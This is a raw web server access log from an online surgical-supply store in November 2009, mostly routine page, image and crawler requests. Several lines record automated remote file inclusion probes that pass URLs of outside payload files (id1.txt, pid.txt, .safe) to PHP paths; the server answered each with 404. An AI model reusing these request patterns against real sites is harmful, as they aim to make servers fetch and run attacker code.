121.169.189.169 - - [26/Nov/2009:03:54:46 -0500] "GET /images/DISCOVER.GIF HTTP/1.1" 200 2579 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:46 -0500] "GET /images/space.gif HTTP/1.1" 200 43 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:46 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:59 -0500] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:00 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CE578381100079DC08E+M37+ENG HTTP/1.1" 200 64381 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:02 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:05 -0500] "GET /images/bt_cal-b.gif HTTP/1.1" 200 506 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE578381100079DC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:10 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG HTTP/1.1" 200 40393 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE578381100079DC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:13 -0500] "GET /images/sd_left-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:13 -0500] "GET /images/sd_left-bottom.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:13 -0500] "GET /images/sd_bottom-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:13 -0500] "GET /images/sd_left-top.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:13 -0500] "GET /images/sd_bottom-right.gif HTTP/1.1" 200 101 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:13 -0500] "GET /images/sd_inside-corner.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:55:13 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
67.195.111.169 - - [26/Nov/2009:03:54:35 -0500] "GET /logs/access_log.Q109102200 HTTP/1.0" 200 5276074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.199.140.158 - - [26/Nov/2009:03:55:32 -0500] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:56:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.65.67 - - [26/Nov/2009:03:57:04 -0500] "GET /images/items/index5_microscis.jpg HTTP/1.1" 200 2226 "-" "Googlebot-Image/1.0"
121.169.189.169 - - [26/Nov/2009:03:57:22 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE588571400082EC08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
67.195.111.169 - - [26/Nov/2009:03:59:40 -0500] "GET /logs/error_log.Q109100800 HTTP/1.0" 200 4370457 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.187.234.206 - - [26/Nov/2009:04:00:56 -0500] "GET /logs/access_log.Q109081500////include/bbs.lib.inc.php?site_path=http://www.jacrafts.com/images/discounts/rhs/pid.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.187.234.206 - - [26/Nov/2009:04:01:08 -0500] "GET /logs/access_log.Q109091100////include/bbs.lib.inc.php?site_path=http://www.jacrafts.com/images/discounts/rhs/pid.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:04:01:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.234.106.119 - - [26/Nov/2009:04:02:56 -0500] "GET //bbs////skin/sirini_simplism_gallery_v4/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:04:02:56 -0500] "GET /logs//bbs////skin/sirini_simplism_gallery_v4/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.234.106.119 - - [26/Nov/2009:04:02:56 -0500] "GET /logs/error_log.Q109110700%20%20//bbs////skin/sirini_simplism_gallery_v4/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.236.46.4 - - [26/Nov/2009:04:05:04 -0500] "GET /logs/access_log.Q109050800/modules/My_eGallery/index.php?basepath=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:04:05:04 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:04:05:04 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
66.249.65.68 - - [26/Nov/2009:04:06:06 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.68 - - [26/Nov/2009:04:06:06 -0500] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.236.46.4 - - [26/Nov/2009:04:06:14 -0500] "GET /logs/access_log.Q109110600//index.php?m=tasks&inactive= HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:04:06:14 -0500] "GET //index.php?m=tasks&inactive= HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:04:06:14 -0500] "GET /logs//index.php?m=tasks&inactive= HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
85.236.46.4 - - [26/Nov/2009:04:06:28 -0500] "GET /logs/error_log.Q109101800/modules/My_eGallery/index.php?basepath=http://www.ranjessica.com/smf/Themes/.safe??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Nov/2009:04:06:29 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.101.214.54 - - [26/Nov/2009:04:06:32 -0500] "GET /logs/error_log.Q109110700%20%20//bbs////skin/sirini_simplism_gallery_v4/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
121.101.214.54 - - [26/Nov/2009:04:06:32 -0500] "GET /logs//bbs////skin/sirini_simplism_gallery_v4/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.236.46.4 - - [26/Nov/2009:04:06:33 -0500] "GET /logs/error_log.Q109110600//index.php?m=tasks&inactive= HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.101.214.54 - - [26/Nov/2009:04:06:35 -0500] "GET //bbs////skin/sirini_simplism_gallery_v4/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.75.45.115 - - [26/Nov/2009:04:07:22 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:07:22 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:07:26 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:07:26 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:08:51 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:08:52 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:20 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:20 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:29 -0500] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus HTTP/1.1" 200 59152 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:32 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:33 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:33 -0500] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:33 -0500] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:33 -0500] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:35 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:35 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:35 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:35 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.75.45.115 - - [26/Nov/2009:04:09:35 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sinus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.3; (R1 1.6); Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
